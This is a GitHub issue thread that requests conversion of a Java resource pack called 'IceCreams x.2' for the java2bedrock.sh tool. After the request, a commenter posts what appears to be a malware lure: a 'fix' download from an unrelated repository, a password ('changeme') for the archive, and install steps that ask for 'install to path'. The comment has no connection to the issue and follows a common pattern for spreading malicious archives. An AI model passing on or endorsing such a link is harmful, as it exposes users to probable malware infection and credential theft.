### ISSUE TITLE
[Pack]: IceCreams x.2

### ISSUE THREAD

**Issue by Kryspzk** [Kas-tle/java2bedrock.sh#33482]
### Java Pack Direct Download URL

https://www.dropbox.com/scl/fi/lzvkg6f48gie0si7uz0e4/pack.zip?rlkey=6kuxpln1o5spmld54znf8znyo&st=nkrb3sw8&dl=0

### Default Assets Version

None

### Block Material

None

### Attachable Material

None

### Archive Scratch Files

None

### Rename Model Files

None

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
